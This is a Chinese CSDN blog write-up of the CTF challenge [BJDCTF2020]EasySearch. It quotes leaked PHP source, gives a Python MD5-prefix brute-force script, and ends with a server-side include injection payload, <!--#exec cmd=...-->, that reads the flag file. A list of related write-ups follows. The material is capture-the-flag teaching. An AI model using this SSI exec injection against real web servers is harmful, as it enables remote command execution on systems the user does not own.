[BJDCTF2020]EasySearch(ssi漏洞)

最新推荐文章于 2024-07-12 01:02:14 发布
最新推荐文章于 2024-07-12 01:02:14 发布
阅读量383 收藏 1
点赞数
分类专栏: CTF 文章标签: php python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45708109/article/details/108810902
版权

1.首页御剑扫描可以发现有index.php.swp,可以查看源码

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

可以看到当password的md5值的前六位是6d0bc1时那么就可以进去。
简单写个脚本爆破一下:

import hashlib
for i in range(1,10000000):
    res=hashlib.md5(str(i).encode()).hexdigest()
    if res[:6]=="6d0bc1":
        print(str(i))
        break

爆破得到2020666。这里发现
在这里插入图片描述
访问一下看看是什么。
发现返回了admin
在这里插入图片描述猜测是ssi注入
在这里插入图片描述
最终payload,访问就有flag在这里插入图片描述最终payload:<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->

旸哥哥
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
---------已搬运-------BUUCTF:[BJDCTF2020]EasySearch ----- ssi注入漏洞
Zero_Adam的博客
02-25 314
目录:一、自己做:二、不足&&学到的三、学习WP 一、自己做: 二、不足&&学到的 三、学习WP
[BJDCTF2020]EasySearch
SopRomeo的博客
03-31 3722
sql注入没回显,扫描一下后台,最后用御剑扫描到了index.php.swp 进去是一段源代码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $c...
[BJDCTF2020]EasySearch 1
最新发布
ubaichu的博客
07-12 352
[BJDCTF2020]EasySearch 1 题目详解
[BJDCTF2020]EasySearch([Apache SSI 远程命令执行漏洞)
EC_Carrot的博客
12-22 267
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 打开题目是个登录界面,尝试了一下注入好像不太行 扫一下目录发现有备份文件index.php.swp <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^
BDJCTF-2020-Web-easy_search
feng的博客
11-05 422
WP 进入环境,看到是个登录页面,第一反应是SQL注入。。。然后我就在SQL注入的路上一去不复返了。 感觉自己就是做题思路不是很开阔,知识点学的差是一个方面,思维的发散性又是一个方面。这题关键的信息在index.php.swp,考虑到自己SQL注入不行,应该去转换思路,去尝试其他的方向,比如备份文件这样的。 不过这题似乎直接扫目录就可以扫到index.php.swp,不过我dirsearch没扫到,还是自己字典的问题,要慢慢增加自己字典的容量。 然后就是代码审计: <?php ob_start();
[BJDCTF2020]EasySearch1
qq_45829213的博客
01-26 2975
buuctf 源码泄露 ssi远程命令执行漏洞
BUUCTF web [BJDCTF2020]EasySearch wp
Whaocai的博客
08-02 319
考点 ①ssi注入 进去之后是一个登录框,猜测有没有register.php,经过测试也不存在sql注入。直接御剑扫描(扫buuctf上的题要调线程和超时,我是线程10超时15,不然会被平台禁掉)。扫出来了index.php.swp index.php.swp源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2761
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
漏洞挖掘】——19、SSI漏洞的利用思路
Fly_鹏程万里
03-03 7139
在测试任意文件上传漏洞的时候如果目标服务端可能不允许上传php后缀的文件,但是目标服务器开启了SSI与CGI支持,此时我们可以上传一个shtml文件并利用语法执行任意命令。
web buuctf [BJDCTF2020]EasySearch
weixin_44214568的博客
04-12 561
知识点:Apache SSI漏洞 Apache安全漏洞_0ak1ey的博客-CSDN博客_apache漏洞 Apache SSI远程命令执行漏洞_0ak1ey的博客-CSDN博客_apache命令执行漏洞 Apache SSI 远程命令执行漏洞 - MCY5 - 博客园 1.开题: 看到题目的时候,我就准备用dirsearch扫描,但是没有扫描出来,我又御剑扫了一遍,第一遍没扫出来,我把线程改成1才扫出来的, 2.贴源码 <?php ob_start(); functio.
BJDCTF2020]EasySearch
CyhDl666的博客
03-11 189
dirsearch扫描发现index.php.swp文件 给了源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$char.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值